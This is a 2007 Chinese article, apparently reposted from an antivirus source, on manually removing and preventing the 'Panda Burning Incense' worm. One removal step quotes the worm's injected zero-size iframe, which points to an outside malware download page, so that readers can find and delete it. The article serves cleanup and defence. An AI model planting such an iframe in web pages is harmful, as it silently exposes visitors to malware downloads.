|
|
|
不用烧香拜佛 自己动手消灭“熊猫烧香” |
|
发文时间: 2007-7-17 8:33:45 来源:网络综合
近一段时间,一个名为“熊猫烧香”(Worm.Nimaya)的病毒在互联网上疯狂肆虐。
该病毒采用“熊猫烧香”头像作为图标,诱使用户运行。该变种会感染用户计算机上的EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。一些网站编辑人员的电脑如果被该病毒感染,上传网页到网站后,就会导致用户浏览这些网站时也被病毒感染。目前多家著名网站已经遭到此类攻击,而相继被植入病毒。
清除该病毒并不是特别复杂,一些变种依靠手工的方法就可以清除。
一、手工清除
第一步:点击“开始→运行”,输入“ntsd -c q -pn spoclsv.exe”并确定,结束病毒的进程。
第二步:在注册表中寻找“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL”,将CheckedValue的值改成1。打开“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run”,将svcshare的项目删除。
第三步:删除硬盘各个分区根目录下的“setup.exe”和“autorun.inf”文件;删除掉C:\Windows\System32\Drivers下的spoclsv.exe文件。
第四步:搜索硬盘上的网页格式文件,找到其中类似“<iframe src="http//www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>”的文字,将其删除。注意,被嵌入的代码可能是其他的网址。
该病毒的一些变种会感染EXE可执行文件,因此建议使用杀毒软件或专杀工具清除该病毒。
二、如何防范“熊猫烧香”病毒
第一,安装杀毒软件升级到最新版本,并打开实时监控程序。
第二,该病毒会利用IE、QQ等的漏洞进行传播。瑞星卡卡3.2中的IE防漏墙功能可有效阻止该病毒利用这些漏洞进行传播。
第三,计算机应设置复杂的密码,以防止病毒通过局域网传播。
第四,QQ、UC的漏洞已经被该病毒利用,请用户及时安全它们的最新补丁程序。
第五,关闭系统的“自动运行”功能,防止病毒通过U盘、移动硬盘等侵入用户的电脑。
小提示:使用专杀工具清除
针对该病毒,瑞星已经推出了专杀工具。任何人均可登录瑞星网站http://it.rising.com.cn/Channels/Service/2006-11/1163505486d38734.shtml免费下载使用。专杀工具采用瑞星独创的未知病毒查杀技术,可有效清除“熊猫烧香”病毒及其未知变种。
 |
|
|
[问题咨询] |
|
|
|
|
相关网站:
->
点击这里进入"不用烧香拜佛 自己动手消灭“熊猫烧香”"相关网站.
阅读次数: |
|
阅读排行